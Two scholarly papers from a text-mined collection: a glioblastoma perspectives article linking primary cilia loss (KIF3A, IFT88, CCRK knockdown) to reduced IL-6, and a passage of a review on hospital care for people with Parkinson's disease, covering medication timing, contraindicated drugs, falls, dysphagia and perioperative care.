Total RNA was isolated from glioblastoma cells (3 x 10 5 ) using the RNeasy Plus Mini Kit (Qiagen, Valencia, CA).Isolated RNA (500 ng) was then utilized to perform a reverse-transcription reaction (30 ml) with random hexamers and SuperScript III RT (Thermo Fisher Scientific).The resulting cDNA (5 ml) was used for real-time PCR using the TaqMan gene-expression assay for KIF3A ( H s 0 0 1 9 9 9 0 1 _ m 1 ) , C CR K ( H s 0 1 1 1 4 9 2 1 _ m 1 ) , I F T 8 8 (Hs00544051_m1), and actin (Hs00188792_m1), according to the manufacturer's instructions.2−DDCt was used to determine the relative expression levels of the target genes.All experiments were performed in triplicate.
Enzyme-linked immunosorbent assay
The cellular levels of IL-6 were measured after knockdown of cilia proteins using ELISA.Specifically, the Millipore Human IL-6 ELISA kit (Millipore, Billerica, MA, Cat#RAB0306) was performed according to the manufacturer's instructions and analyzed at 450 nm using a plate reader (BioTek, Winooski, VT).Each sample was performed in triplicate from which the means and standard deviations were calculated.
Immunocytochemistry
Transfection of dBT116 was conducted by transferring 10 µL of shRNA transduction particles (Clone ID TRCN0000199977, SHCLNV, Sigma-Aldrich, St. Louis, MO) in polybrene (10 µg/ mL) to a 6 well plate containing 1 x 10 6 bone marrow mononuclear cells in 3 mL of complete dBT116 cell medium.After 24 hours, the medium was changed to virus-free complete DMEM with 10% FBS medium, and puromycin selection was initiated (2 µg/mL, Sigma-Aldrich).Immunocytochemistry experiments were conducted on days 5-7 after antibiotic selection.
Two-well chamber slides were coated with collagen, type I solution (Sigma Aldrich, Burlington, MA) diluted in 70% ethanol per manufacturer protocol.Cultured cells were seeded and incubated overnight at 37 degrees Celsius.Cells were washed in filtered 1X PBS three times and fixed with 4% formaldehyde for 10 minutes at room temperature.Cells were washed three times in filtered 1X PBS, permeabilized in filtered 0.5% Triton X-100 in PBS for 15 minutes, washed four times and incubated with filtered blocking solution (PBS containing 0.15% Glycine and 0.5% BSA) for 60 minutes at room temperature.Cells were then incubated with primary antibodies in 1X PBS for 1 hour, washed three times with 1X PBS, and incubated in the dark with secondary antibodies conjugated to Alexa Fluor 488 and 549 for Arl13B and gamma tubulin, respectively, in 1X PBS for 1 hour at room temperature (1:300, Invitrogen, Waltham, MA).Primary antibodies used were mouse monoclonal Arl13B (1:300, Invitrogen), rabbit monoclonal gamma tubulin (1:300, Invitrogen).Antifade mounting medium with DAPI was used to coverslip the slides (Thermo Fisher, P36935).Images were collected using a Leica DMi8 widefield fluorescence microscope with a 20X objective for DAPI, Alexa 488, and Alexa 549 fluorophores (Leica Biosystems, Buffalo Grove, IL).
Statistical analysis
All data represent at least three individual experiments.For the direct comparison of three or more conditions a one-way analysis of variance was performed, with multiple comparisons analyzed via Newmans-Keuls multiple comparisons test.When directly comparing two conditions a two-tailed student-t test was performed.All comparisons were considered significant with pvalues less than 0.05.
Primary cilia loss reduces IL-6 expression in human glioblastoma cells
The function of primary cilia in cancer has been gaining interest over the past two decades, and is known to influence pathogenesis of some CNS neoplasms including medulloblastoma, choroid plexus papilloma, and ependymoma (15).In vitro and in vivo models of ciliary ablation including knockdown or knockout of KIF3A and IFT88 have been invaluable tools for dissecting and understanding the myriad functions of the primary cilium.KIF3A is a microtubule plus end-directed kinesin motor that is required for ciliogenesis (16).Intraflagellar transport protein 88 (IFT88) is necessary for primary cilia assembly via the transport of essential components up the ciliary axoneme (17).Previous immunocytochemistry studies have shown loss of primary cilia following KIF3A or IFT88 knockdown (18,19).Cell cycle-related kinase (CCRK) now known as CDK20 has been specifically implicated in tumor-mediated immunosuppression by induction of MDSC in response to IL-6 upregulation (20).However, we previously showed that CCRK is required for proper cilia morphogenesis in a knockout mouse model (21).As CCRK is highly overexpressed in glioblastoma and considered an oncogene, we questioned whether the elevated IL-6 expression and the resulting immunosuppressive phenotype was due to CCRK's role in cilia morphology versus other unrelated activity.To that end, we performed siRNA-mediated knockdown of CCRK as well as KIF3A and IFT88.Our hypothesis was that if IL-6 expression was dependent on primary cilia, then all three knockdowns would result in reduction of IL-6 expression.As demonstrated in Figure 1, siRNA targeted against KIF3A, IFT88, and CCRK resulted in robust knockdown of each protein (Figures 1A, B) as well as each corresponding mRNA (Figure 1C).Fluorescence immunocytochemistry confirmed primary cilia loss with CCRK suppression compared to control (Figures 1F, G).Loss of these essential ciliary genes each resulted in a similar loss of IL-6 protein levels through ELISA (Figures 1D, E).
Discussion
Glioblastoma remains a universally incurable and fatal disease.One important characteristic of glioblastoma is profound local and systemic immunosuppression.The latter is the result of a multitude of means by which glioblastoma hijacks the immune system including the kynurenine-tryptophan (IDO-TDO1) pathway, expression of pro-mitogenic, immunosuppressive EVs, the release of anti-inflammatory cytokines, and manipulation of checkpoint proteins (e.g., PD-1, CTLA-4).There is considerable interest in studying the biological roles of primary cilia in glioblastoma as a path for drug development.Prior studies established that cilia are present in glioblastoma cells, with one study finding 8-25% of glioblastoma cells bearing primary cilia at any point in time (22).The same group later found that 60-90% of single clones from patient-derived glioblastoma cell lines were able to generate ciliated offspring (23).While cilia-dependent signaling is present in glioblastoma, it is unclear how cilia-dependent signaling cascades act in a tumor-promoting or suppressing manner.For instance, disruption of cilia formation in glioblastoma cell lines through knockdown of essential ciliogenesis genes, such as KIF3A or IFT88, had variable effects on tumor growth in vitro and in vivo (23).There is evidence, however, that treatments aimed to reduce ciliogenesis could enhance conventional glioblastoma therapies.For instance, PCM1-mediated depletion of cilia in patient-derived glioblastoma cell lines led to decreased proliferation and increased sensitivity to temozolomide (TMZ) treatment (24).There is a preponderance of evidence that now links canonical pathways of glioblastoma immune evasion with primary cilia signaling.The objective of this perspectives article is to review evidence supporting potential mechanisms by which cilia-dependent signal transduction contributes to glioblastoma-mediated immunosuppression.
CCRK, IL-6 and the cilia connection
Cell cycle-related kinase (CCRK) plays an evolutionarily conserved role in the assembly of cilia and is highly overexpressed in gliomas where it is thought to play an oncogenic role (21,25).CCRK knockout mice display neural tube and skeletal defects identical to those seen in SHH deficient mice; embryonic fibroblasts derived from these mice showed dysmorphic, non-functional cilia (21).In vitro, CCRK overexpression reduces cilia frequency and promotes proliferation in the U-251 glioblastoma cell line (26).Conversely, CCRK silencing led to the inhibition of cell growth in high CCRK-expressing U-373 and U-87 cell lines (27).Interestingly, CCRK activity has been linked to cytokine expression in other tumor models.For instance, in the Hepa1-6 hepatocellular carcinoma model, CCRK is necessary for IL-6 expression which led to the expansion of MDSCs in peripheral blood (20).Whether this relationship between IL-6 and CCRK was related to the role of the latter in cilia structure and function has never been explored.We now show a similar statistically significant reduction in IL-6 intracellular concentrations following depletion of proteins required for ciliogenesis (Figure 1).The implication is that it is the primary cilia specifically, and not CCRK per se, that is important in driving IL-6 expression and that the relationship noted between CCRK, IL-6, and MDSC expansion is a direct result of the role of CCRK on primary ciliogenesis.We found a similar result with stable lentiviral transduction of shRNAs against essential ciliogenesis proteins and subsequently performed transcriptomic sequencing (data not shown).A potential mechanism in which cilia signaling may regulate IL-6 expression may be through the GLI1-SHH pathway-the best described cilia-dependent signaling cascade.The binding of SHH to the patched-1 receptor leads to the translocation and accumulation of Smoothened at the ciliary tip and activation of the GLI family of transcription factors, including GLI-1 (28).In a murine model of pancreatic cancer, GLI-1 binds to the IL-6 promoter and increase its expression, leading to a more aggressive phenotype (29).In the absence of activated GLI-1, mice developed only low-grade lesions and at a low frequency.Glioblastoma and pancreatic adenocarcinoma are reliant on EVs and IL-6 for immune modulation and cellular proliferation.Thus, the implication of primary cilia may have far-reaching implications across multiple cancers.
IL-6 has emerged as a potential therapeutic target in treatment of glioblastoma.Rolhion et al. found that glioblastomas displayed significantly higher IL-6 expression compared to other glioma types (3).IL-6 then orchestrates recruitment of tumor-associated macrophages of the M2 suppressive phenotype which produce anti-inflammatory cytokines like IL-10 and TGF-b, which in turn inhibit tumor-associated T-cell invasion and activation (30).Glioblastoma secretion of IL-6 increased PD-L1 expression on peripheral myeloid cells, promoting T cell anergy (31).Levels of IL-6 found in serum and cerebrospinal fluid corresponded to glioma grade, with significant reduction in levels following resection (32).Yang et al. found that knockout of IL-6 reduced the intra-tumoral population of myeloid cells and macrophages and enhanced the population of CD8+ T cells (30).Concomitantly, anti-IL-6 therapy improved overall survival by 30% in a GL261 murine glioblastoma model (30).Analysis of the TCGA dataset revealed that IL-6 and IL-6R mRNA levels were significantly higher in mesenchymal subtype and IDH-wildtype glioblastoma (33).As mentioned previously, the mesenchymal subtype has the highest infiltration of immune cells.The influx and subsequent reprogramming of resident immune cells is due in part to EVs and IL-6, both of which are likely dependent on cilia signaling.
Review of glioblastoma-mediated immunosuppression: EVs, MDSCs, and tumor-associated myeloid cells
Extracellular vesicles (EVs) are a heterogeneous group of lipid membrane-enclosed vesicles released ubiquitously from cells and contain proteins, nucleic acids, and other biological mediators (34).They allow for intercellular communication in both physiologic and pathophysiologic states.Several cancers including breast, pancreas, prostate, and brain produce high levels of EVs which operationalize the local cellular milieu (35)(36)(37).Glioblastoma-derived EVs were first described by Skog et al. in 2008 and actively promote glioblastoma cell proliferation and angiogenesis (38).There is now an abundance of contemporary evidence supporting a role for glioblastoma EVs in regulating multiple pathways that ultimately contribute to several key glioblastoma characteristics including tumor-mediated immunosuppression.Hoang-Minh et al. demonstrated that glioblastoma primary cilia produce vesicles that may have overlap with EVs.During G 0 phase, glioblastoma primary cilia had vesicles that appeared to bud from the tip and floated away out of the field of view (15).Furthermore, they found that these vesicles had mitogenic capacity, as their presence promoted tumor cell proliferation.It is possible that these same cilia-derived vesicles also contribute to the local and systemic immunosuppression which are hallmarks of glioblastomas and other cancers.
Local immunosuppression in the glioblastoma microenvironment is dependent on tumor-associated myeloid cells (microglia, macrophages, and monocytes) which constitute up to 30-50% of cells within glioblastoma tissues (39)(40)(41).These immune cells migrate via chemotaxis into the glioblastoma tumor microenvironment.Once within the tumor stroma, cells in the tumor microenvironment (including immune cells) are exposed to high EV levels and (and presumably EV content) as well as other soluble factors.Glioblastoma EVs in the tumor microenvironment then stimulate local astrocytes to produce cytokines including CSF2 and 3, IL-4, -6, -10, and -13, which together promote a T-helper type 2 immunosuppressive phenotype (42).The result is immune cell reprogramming into immunosuppressive regulatory cells.Furthermore, glioblastoma EVs enhance the phagocytic capacity of tumor-associated macrophages and enhance the expression of membrane type 1-matrix metalloproteinase in microglia (43).Tumor-derived EVs promote extracellular matrix remodeling (ECM), thus facilitating tumor migration and invasion (44,45).There is evidence of heterogeneity in EV expression and effects among glioblastoma subtypes.Mesenchymal glioblastoma cells secrete EVs at higher levels compared to those of the classical and pro-neural subclass as identified by mass spectroscopy (43).Low glioma EV concentrations are associated with immune activation and increased migration capacity of peripheral blood mononuclear cells (PBMCs), while high EV concentrations impair PBMC migration (46).The mesenchymal glioblastoma subtype has been associated with the highest infiltration of tumor-associated lymphocytes (47).
Glioblastoma-derived EVs are also implicated in systemic immunosuppression in glioblastoma.These EVs induce monocytes into myeloid-derived suppressor cells (MDSCs) and nonclassical monocytes (NCMs).Elevated levels of MDSCs are described in a number of cancers including melanoma, renal, gastric, bladder, pancreatic, and gliomas (48).The induction of MDSCs is particularly robust in glioblastomas with circulating MDSCs in glioblastoma patients estimated at up to 12 times greater than that seen in controls (49, 50).Predictably, there are resident NCMs and MDSCs identifiable in freshly resected glioblastoma tissue (5).Jung et al. showed that induction of MDSCs and NCMs was dependent on both PD-L1 and IDO1 expression within the EVs in a mechanism dependent on interferon-g (51).Interestingly, there was no identifiable direct effect of glioblastoma EVs on T cells.Instead, there was evidence for production of IL-10 by MDSCs and NCMs with resulting T cell inhibition.Glioblastoma patients have higher proportions of tumor-infiltrating regulatory Tregsan effect of high circulating MDSCs (52,53).Compared to PBMCs, the ratio of exhausted CD4+ and CD8+ T cells are significantly higher in tumor regions (54).Glioblastoma-infiltrating NK cells show significantly lower cytolytic ability, owing to lower levels of interferon-g (54).Treg-depletion in a murine glioma model revealed prolonged survival compared to control mice (55).EVs regulate additional key tumor characteristics including remodeling innate and adaptive immune cell behaviors, promoting therapy resistance, glioma stemness, and tissue invasion.
We present a theoretical framework in which primary cilia participate in glioblastoma immune programming (Figure 2) and to present preliminary data supporting this hypothesis.We have shown that through disruption of primary cilia via knockdown of CCRK, KIF3A, or IFT88, there is decreased IL-6 protein expression.It is evident that IL-6 is crucial for coordinating the M2 macrophage response in the glioblastoma microcompartment.Nonetheless, anti-IL-6 monotherapy only showed modest efficacy in in vivo preclinical glioblastoma models (30,31).Glioblastoma EVs are central to intercellular communication among glioblastoma cells, the local milieu, and peripheral immune cells.Primary cilia are a major organelle in extracellular communication and microenvironment sensing, and we cannot exclude the possibility that primary cilia are involved in GBM EV release, especially considering that vesicles have been shown to be released from primary cilia (15).Whether these primary cilia-derived vesicles are indeed EVs and associated with tumor-mediated immunosuppression, is unknown, and should be an avenue for further investigation.Understanding the contribution of primary cilia to GBM tumor immunosuppression may be pivotal in the development of novel therapies.
Implications for glioblastoma immunotherapy
Immunotherapy has garnered interest in glioblastoma research in large part due to the revolutionary improvement in survival noted with several systemic cancers.Unfortunately, no immunotherapy treatments have met the efficacy and safety profiles to be adopted for widespread clinical use or FDA approval.It is possible that primary cilia, as the principal organelle in microenvironment sensing and communication, is involved in regulation of both IL-6 and glioblastoma EVs.Primary cilia signaling could be therapeutically targeted, leading to suppression of IL-6, EV packaging and secretion, and other cellular cues such as proliferation and invasion.Thus, the immunosuppressive effects of these soluble factors could be potentially reversed, reconstituting antitumor immunity, rendering glioblastomas more amenable to immunotherapy.Further investigation into the interplay between primary cilia signaling and glioblastoma-mediated immunosuppression will be necessary and may lead to the development of novel 'ciliotherapeutic' approaches to glioblastomas.
Conclusions
Glioblastoma is the most common CNS malignancy.It remains universally fatal with only small gains in survival over the last 3 decades.The tumor is genetically complex with several simultaneously dysregulated pathways.There is also profound local and systemic immunosuppression which limit efficacy of immunotherapy.Understanding the interplay between glioblastoma and its microenvironment is key to developing effective immunotherapies.In this perspectives article, we provide evidence for a role of primary cilia in IL-6 release and immunosuppression.We also suggest a potential role of primary cilia in EV release.There is potential for novel cilia-related therapeutic strategies which would be welcomed addition in the armamentarium against this deadly disease.
1 IL- 6
FIGURE 1IL-6 expression is dependent on primary cilia.Ciliogenesis-required proteins KIF3A, IFT88, and CCRK were depleted via transfection using siRNA or a scrambled control (siCON).(A) dBT114 cell protein levels were assessed with immunoblotting assay with HSP90 serving as loading control.(B) Densitometric analysis of the bands are shown.(C) The effect of knockdown on IL-6 mRNA transcription in dBT114 cells was assessed by qRT-PCR.Knockdown of genes required for ciliogenesis resulted in depletion of IL-6 as assessed by ELISA for cell lines (D) dBT116 and (E) dBT114.All experiments were performed in triplicate.Means were compared using the two-sided student's t-test.*** denotes a P-value <0.005.CCRK was suppressed using shRNA or a scrabbled control (shCON) and immunocytochemistry performed on dBT116 glioblastoma cells for the basal body with gamma tubulin and then primary cilia axoneme with Arl13B.Nuclei were stained with a DAPI counterstain.Representative images were obtained at 20X with DAPI, Alexa 488, and Alexa 549 fluorophores.Scale bar 20 µm.(F) Control dBT116 cells (shCON) demonstrating the presence of a basal body as well as an adjoining Arl13B-positive axoneme indicating the presence of a primary cilia.(G) CCRK suppressed dBT116 cells (shCCRK) have basal bodies revealed through gamma tubulin staining, but lack primary cilia, as evidenced by the absence of a Arl13B-positive axoneme.Arrows denote structures of interest.**** denotes a P-value <0.001.
FIGURE 2
FIGURE 2Mechanisms of Glioblastoma-Mediated Immunosuppression.Immunosuppressive effects can be categorized as those resulting from EVs, IL-6 or both.Primary cilia may be involved in both EV release as well as IL-6 expression and those may play a central role in tumormediated immunosuppression. | 2023-12-20T16:03:52.839Z | 2023-12-18T00:00:00.000 | {
"year": 2023,
"sha1": "cc7873f2ac058076302f0e79b819dca170574a76",
"oa_license": "CCBY",
"oa_url": null,
"oa_status": null,
"pdf_src": "PubMedCentral",
"pdf_hash": "4ef26b5b399f55d64906555dcdc6f8e89b6d3d25",
"s2fieldsofstudy": [
"Medicine",
"Biology"
],
"extfieldsofstudy": []
} |
258982417 | pes2o/s2orc | v3-fos-license | Inpatient Parkinson’s Care: Challenges and Special Considerations
<jats:p>-</jats:p>
that prevent accurate administration of medications. Inaccuracies in medication administration occur at alarming rates; up to half with missing doses [14] and administrations occurring 30 minutes later from order times in 51% of doses and one hour later than order times in 30% of doses. [15] Furthermore, people with PD have individualized outpatient regimens with varying doses, formulations and time intervals that are tailored to their symptoms throughout the day. One significant source of error is orders written as "qd," "bid," and "tid," to suit hospital schedules, which are inappropriate for time-dependent dopaminergic PD medications and are often deviant from the patient's home regimen. [12] We examined deviation rates between hospital administration times and the patient's home regimen [16] and found that 47% had an average hospital dose timing interval that differed from outpatient timing interval by greater than 30 minutes. Admissions where at least one day included a 30-minute or greater deviation in the dosing interval had a longer length of stay (median 4.6 days vs 2.0 days). Delays in administration of inpatient orders and when compared to outpatient regimens have demonstrated poor outcomes, emphasizing the need for strict adherence to patients' individualized outpatient medication regimens.
PD medication regimens are varied and complex.
Levodopa formulations are varied and complex with different pharmacokinetic and pharmacodynamic properties by formulation. [11,17] For example, carbidopa/levodopa immediate release (IR) when combined with entacapone has the same half-life but takes longer to absorb and has a 30% higher levodopa equivalent daily dose. Of note, entacapone should be administered concomitantly with levodopa for its effect of increased and more sustained plasma levodopa concentrations. Another formulation, carbidopa-levodopa controlled release (CR) has a bioavailability of 70% of IR with a maximum serum concentration of 30%, thereby requiring individual doses to be as high as three times IR doses to achieve the same plasma levels. [17] Aside from variations in levodopa, patients are on a wide variety of PD medications including dopamine receptor agonists, catechol-O-methyltransferase (COMT) inhibitors, adenosine 2A receptor antagonists, anticholinergics and other medications used to treat non-motor symptoms including those for psychosis, orthostatic hypotension, etc. Each medication has a different levodopa equivalent daily dose [18,19], which makes conversion from one to the other error prone, especially for clinicians relatively inexperienced with PD care.
Certain medications are contraindicated due to PD pathophysiology.
Another common issue is that contraindicated medications are often given when patients decompensate, which further worsens motor function, resulting in immobility and falls. An acutely agitated patient may be given haloperidol, or a nauseated patient may be given metoclopramide. Due to the fundamental PD pathophysiology involving loss of dopaminergic cells, it is important to take note of medications that affect dopaminergic states. Relatively commonly encountered medications with dopamine receptor blocking properties include antipsychotic drug classes (haloperidol, fluphenazine, chlorpromazine, risperidone, olanzapine, ziprazisone, aripiprazole, etc.) and antiemetic drug classes (metoclopramide, promethazine, prochlorperazine, etc).
Administration of contraindicated medications in PD patients experiencing delirium has been associated with increased lengths of stay compared to individuals without PD. [20] These further worsen mobility, cognition and swallowing [4,12,21] resulting in extended hospital stays and increased fatalities. [16,22,23] Medication selection is critical when managing behavioral issues to avoid worsening motor function and medical complications.
Patients with PD are at an increased risk of mental status changes in-hospital.
People with PD have as high as a five-fold risk of experiencing delirium or psychosis in the hospital. [24] Manifestations are variable, including confusion, hallucinations, agitation and hypomania [25], and underlying etiologies are multifactorial. Patients are being managed for acute and active conditions such as metabolic derangements, infections, or surgical procedures, which predisposes them to mental status changes secondary to systemic illnesses or exposure to new medications including certain classes of antibiotics and anesthetic agents. Among patients undergoing surgical procedures, as high as 60% of patients with PD experienced acute postoperative confusion lasting an average of 2.5 days with the relative risk between 2.8% to 8.1%. [26] The hospital is also an unfamiliar environment with continuous monitoring that often disrupts patients' circadian rhythm. These create challenges for patients with PD who thrive on familiarity and routine. Lastly, patients may have baseline cognitive impairment prior to hospitalization. This lowers the threshold for mental status changes in an unfamiliar environment when compounded by active metabolic derangements, infectious/inflammatory processes and/or exposure to new medications.
Patients with PD are at an increased risk for falls.
Hospitalized patients are at an increased risk for falls. [27] This risk is even higher in patients with PD due to several factors aside from their baseline motor impairment or gait instability. Orthostatic hypotension is experienced by up to 40% of patients with PD [28] which increases the risk for falls, morbidity and mortality. [29] This can be aggravated by dehydration or discontinuation of medications for orthostatic hypotension when supine hypertension is encountered by relatively inexperienced clinicians. Nocturnal urinary frequency is also common. The need to void during times of the day when lighting may be poor or when assistance is unavailable predisposes them to falls. Staffing constraints were found to be associated with increased risk of falls. [30] Another important aspect to consider is polypharmacy or the use of new medications including sedatives or antihistamines. [31] The use of antidopaminergic medications has been shown to increase falls with an odds ratio of 5.0 [32], which in turn reduces patients' ability to participate in rehabilitation, and thereby increasing the length of stay. [33] Prolonged NPO status results in complications.
Given that carbidopa/levodopa is dosed several times per day due to its short half-life, problems arise when patients are placed on NPO for a longer period than necessary. A study on perioperative medication withholding found that levodopa median withholding time was 12.35 hours [34], equivalent to 2-4 doses missed depending on patient profile. Another reason a patient may be placed on NPO includes nausea, often without proper dysphagia screening or consultation with a speech language pathologist (SLP). As emphasized, missed doses predispose patients to mobility problems, falls, worsening of tremor, dystonia, dysphagia, freezing of gait and other non-motor symptoms, including shortness of breath and anxiety. Due to consequences with missed doses, circumstances that preclude patients from receiving their medications call for special considerations, which are discussed below.
Certain factors increase their risk for infections.
Patients with PD often experience sialorrhea and may have silent aspiration which increases risk of respiratory infections, [35] emphasizing the need for proactive interventions in this population. Despite pervasive swallowing problems in PD [36], swallow evaluations were performed in only 25% of cases and only 1/8 of patients had swallowing evaluations performed prior to an aspiration event. [37] Increased risk of aspiration can be further aggravated by being placed on prolonged NPO or with prolonged duration of intubation. Considering their baseline swallowing problems, screening and monitoring of swallowing problems should be the standard of care in this population.
Perioperative management of PD presents unique scenarios.
A considerable proportion of people with PD are admitted for emergent or elective surgeries. Perioperative states often predispose this vulnerable population to critical care gaps, which often result in post-procedural deterioration and complications. [38] Patients with sialorrhea and dystonic neck posturing may present challenges in airway management. Dysautonomia and neurogenic orthostatic hypotension is experienced by up to 40% of patients [28] with possible arterial hypertension when supine, [39,40] giving rise to fluctuations in blood pressure control intraoperatively. Patients are also predisposed to medication interactions, particularly those with QT prolongation effects in the setting of concomitant general anesthesia (antiemetics such as ondansetron, antipsychotics such as quetiapine, antidepressants such as citalopram). In cases of postoperative nausea and agitation, a patient is commonly either placed on NPO or given medications with antidopaminergic properties, which further worsen motor function. Mobilization post-surgery is also critical to prevent further deterioration of motor function. Lastly, surgical devices such as deep brain stimulation (DBS) leads and implantable pulse generators (IPG) warrant preoperative preparations.
HOW DO WE OPTIMIZE INPATIENT CARE?
Given what we know about the fragility of people with PD when hospitalized, identifying controllable risk factors and minimizing the impact for this population is paramount. An ideal strategy utilizes a three-pronged approach involving education, technology and proactive intervention utilizing specialists as part of a multifaceted approach.
Medication administration
As individuals with PD are admitted for a myriad of reasons other than PD-related issues, they receive care from units other than those specialized in neurologic care. Therefore, there is a need to educate all providers on complexity of PD medications, emphasizing the need for timeliness of administration and avoidance of substitutions and contraindicated medications. Nursing education and other measures including pharmacist review of medications and improved stocking of medications have reduced length of hospital stay and improved medication administration. [13,41,42] Technology can also enable facilitation of medication administration and avoidance of contraindicated medications. The use of medication order constraints which forces custom hour/minute time orders, drug-disease interactions and missed dose timing alerts, are reminders for all healthcare providers and may be particularly helpful for those relatively inexperienced in PD inpatient care. A full list of medications to be avoided or used in caution among patients with PD can be found in the American Parkinson Disease Association page. [43] Electronic medical record alerts and in-service didactic training sessions for nurses and physicians have indeed been shown to significantly reduce prescribing of contraindicated medications. [42] Along these lines, the clinical pharmacist's role is extremely vital, especially among institutions without the electronic medical record system. Another strategy is to utilize active interventions to improve PD care. Similar to stroke care, it has been suggested that involving PD specialists or advanced practice nurses can improve a patient's hospitalization experience. [44,45] A specialized PD unit where the nursing staff is specifically trained in the care of PD has been shown to result in reduced medication delays, shorter length of stay and fewer episodes of acute delirium. [46] In hospitals where a specialized PD unit may not be feasible, active intervention via PD consultation services is an option. This involves having a physician or nurse trained in PD care as a resource for concerns surrounding special circumstances other staff may be unfamiliar with. In relation to medication availability, it is a common practice for hospital pharmacies to practice judicious selection of specific medications to be stocked. At a minimum, IR carbidopa/levodopa should be stocked with efforts to ensure a supply of at least 24 hours when a patient is admitted. When other levodopa formulations are unavailable, consider using medications from the patient's personal supply, until such a time when the specific formulation is available. As a last resort, levodopa equivalent doses can be calculated with the guidance of a therapeutic exchange protocol. [18,47] The goal, however, is to avoid substitutions unless absolutely necessary, and to maintain all patients on their outpatient regimen as closely as possible (within 15 minutes of outpatient schedule, 100% of the time) unless there is convincing evidence that a recent change in the regimen has created a change in symptoms that have led to hospitalization.
Diet status and progression, speech and swallow
Unnecessary NPO status should be avoided. If NPO status is to be initiated related to swallowing problems that were identified, it is prudent to refer to an SLP for swallowing evaluation prior to placing a patient on NPO. For procedures other than major gastrointestinal surgeries, NPO status should be classified as NPO except for PD medications. Strict NPO including medications status should be reserved only for major gastrointestinal surgeries. If strict NPO status is necessary, alternative routes of administration such as nasogastric tube if without contraindications or alternative formulations should be considered when appropriate for the patient. Options depending on availability include disintegrating via sublingual, inhaled levodopa, intestinal gel infusion through pump, rotigotine transdermal patch, or apomorphine sublingual, subcutaneous injection.
To minimize the risk for aspiration, a standard protocol for screening should be established to assess dysphagia risk. This should also include patients without known swallowing problems prior to admission as silent aspiration and sialorrhea may increase aspiration risks in this population. [35] Screening for dysphagia is to be done within 24 hours ideally, with measures taken to minimize the risk of aspiration pneumonia. Ideally, bedside nurses should be trained to complete bedside swallow screening for all patients with PD and to notify the team of abnormal results, which should prompt referral to SLP for further management. Measures to minimize the risk of aspiration should be in place. These include ensuring that patients are sitting upright in a chair instead of bed when eating or if confined to bed, ensuring that the head of bed is as upright as possible. Patients identified to be at high risk for aspiration based on SLP evaluation warrant closer supervision. Lastly, patients experiencing varying degrees of dysphagia should be placed on the appropriate regimen that prioritizes closest adherence to their home regimen. This entails consulting neurology when considering holding PD medications due to a concern for dysphagia.
Management of mental status changes
Mental status changes (agitation, delirum, psychosis, confusion, hallucinations) are often multifactorial in nature. As PD patients thrive on familiarity and routine, they need to be frequently reoriented to the hospital setting and time of the day. When there is no urgent need for monitoring, minimize nighttime sleep interruptions to allow the patient to rest as best as possible. Maintain a home regimen that worked well prior to admission and correct underlying problems such as metabolic disturbances. Carefully review medications to remove offending factors such as medications that could precipitate delirium. This may entail multidisciplinary management with services involved (eg, infectious disease discussion as certain antimicrobials may lower the threshold to develop mental status changes). When medications are necessary, consider using clozapine, quetiapine or pimavanserin based on best current evidence. [48] Classifications of mental status changes in PD are variable [25] and a consensus on management for acute agitation among patients with PD admitted in-hospital is yet to be established.
Mobilization strategies
Immobilization not only results in poor motor function, but also increases risk for deep venous thrombosis which was present among 5% of PD patients on outpatient workup. [49] Patients should not be confined to bed. Consider reinstating mobilization orders as tolerated and postoperatively when stable with fall precaution. Monitor mobilization of patients with gait problems, use toileting strategies for patients with incontinence, and adjust medications that may predispose patients to falls. Ensure adequate staffing and train allied care professionals (physical and occupational therapists) to allow timely and safe mobilization.
Management of orthostatic hypotension should be optimized as it can be a barrier to effective rehabilitation sessions. When orthostatic hypotension is present, pay careful attention to increases in dopaminergic medications. Consult with a neurologist when considering adjustments in dopaminergic medications. Avoid aggressive management of hypertension in a patient with neurogenic orthostatic hypotension. Hydrate adequately, use medications (midodrine, fludrocortisone, etc.) when appropriate, allow liberal salt in the diet, and elevate the head of bed.
Perioperative considerations
A multidisciplinary approach is warranted to avoid complications that may arise at multiple levels perioperatively. The admitting team, nurses and pharmacy should coordinate to ensure timely administration of medications. Surgeries should be scheduled earlier during the day if the patient is to be placed NPO overnight to minimize disruptions in PD medication regimen. Nuances of NPO and necessary planning before, during and after surgery should be developed through team training and standard perioperative care. Continue to take anti-PD medications with sips of water. Providers should be aware of dopamine agonist withdrawal syndrome manifesting as psychiatric and autonomic manifestations, which may sometimes be mistaken for symptoms of wearing off or mental status changes in hospital. [50] Intraoperatively, the medical team should be aware of possible challenges that may arise in airway management, especially among patients with dystonic neck posturing and sialorrhea. A careful review of the patient's non-motor symptoms is critical to determine any history of dysautonomia as this may give rise to fluctuations in blood pressure control intraoperatively. Fluid volume status and pain should be controlled adequately to prevent blood pressure fluctuations. For patients with PD, paracetamol and nonsteroidal anti-inflammatory drugs (NSAIDs) are generally safe. Carefully review medications as PD patients may be on medications which may be associated with QT prolongation in the setting of concomitant general anesthesia.
For patients with a DBS device, the IPG should be switched off prior to the procedure and switched back on after the procedure. Electromagnetic interference with the IPG by electrical appliances used during surgery and resuscitation (eg, diathermy, electrocautery, external cardiac defibrillator) can alter stimulation and possibly result in IPG failure. [51][52][53] Postoperatively, ensure resumption of PD medications when appropriate (ie, all surgeries other than major gastrointestinal surgery, etc). For patients who are nauseated, consider disintegrating levodopa formulation. Certain institutions utilize a standard postoperative order set intended for the general patient population. Take note of and exclude antidopaminergic medications for nausea and agitation. If an antiemetic is to be given, prefer ondansetron and domperidone instead of metoclopramide, promethazine and prochlorperazine. Finally, ensure early involvement of SLP/occupational therapy to prevent aspiration and physical therapy to prevent deconditioning.
SUMMARY/TAKE HOME POINTS
Individuals with PD are vulnerable during hospitalizations due to the underlying complexities of PD pathophysiology.
A detailed understanding of factors driving the risk for deterioration among hospitalized people with PD is necessary to guide development of targeted care delivery.
Management should involve ensuring accurate medication administration, avoidance of prolonged NPO, fall precaution, appropriate medications for mental status changes, early referral to allied care services, optimization of perioperative care, and timely management of acute changes of PD symptoms impacted by hospitalization.
An integrated care approach involving the patient, caregiver, primary physician, nurse, pharmacist, outpatient neurologist and anesthesiologist is vital in optimizing inpatient care.
